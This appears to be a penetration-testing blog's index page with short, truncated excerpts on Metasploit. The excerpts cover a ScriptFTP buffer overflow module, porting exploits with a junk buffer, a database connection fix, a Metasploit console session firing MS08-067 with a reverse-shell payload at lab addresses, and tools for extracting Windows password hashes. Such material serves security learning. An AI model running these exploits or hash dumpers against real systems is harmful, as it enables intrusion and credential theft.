ScriptFTP <=3.3 Remote Buffer Overflow Exploit (MSF)
You might have read the previous post, ScriptFTP Remote BOF. If you are a Metasploit user, you can add this exploit module to your Metasploit Framework. UPDATE: Metasploit has released their module for ScriptFTP. You can use it now on Metasploit. Thanks to: Cyberheb < mrs[at]infosec-id.com >, Otoy < otoy[at]digital-echidna.org >, TecR0c < roccogiovannicalvi[at]gmail.com >, mr_me < steventhomasseeley[at]gmail.com...
Porting Your Exploit to Metasploit
Some time ago I gave a basic exploit development tutorial (the direct return technique) and an SEH-based exploit development tutorial. Now let's port those exploits to the Metasploit Framework so that they become more reliable and can use the various payloads and advanced features available in Metasploit. We will convert the first exploit, Free CD to MP3 Converter. Before that, we collect the key points that make the exploit work properly, as follows: junk = "\x41" * 4112 # amount of junk that...
MSF Postgres Problem on BT5
If you are reading this post, then I bet you have the same problem as me. When I tried to run msfconsole on my BT5, I got this buggy information: [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host “127.0.0.1″ and accepting TCP/IP connections on port 7175? {“adapter”=>”postgresql”, “database”=>”msf3″, “username”=>”msf3″, “password”=>”7z878914″, “host”=>”127.0.0.1″,...
Metasploit Meterpreter Command Shell Upgrade
Seeing is believing (look at the orange-colored text; that’s what I typed): root@bt:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r13065 updated today (2011.06.29) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf exploit(ms08_067_netapi) > set lhost 192.168.96.1 lhost => 192.168.96.1 msf exploit(ms08_067_netapi) > set rhost 192.168.96.129 rhost...
Dump Windows System Info
When you are asked to collect all Windows system information, such as the list of users, services, installed software and its versions, Windows update history, etc., you will probably want to look at these tools. System Information Collector: WinUpdatesList v1.31, WinAudit Freeware v2.28.2. SAM/Password Extractor: pwdump7* (v7.1) (detected as HackTool/Possible Unwanted Application), FGDump* (detected as HackTool/Possible Unwanted Application), Offline NT Password & Registry Editor by Petter Nordahl-Hagen (must be done in offline mode/reboot the system). If you are familiar with reverse...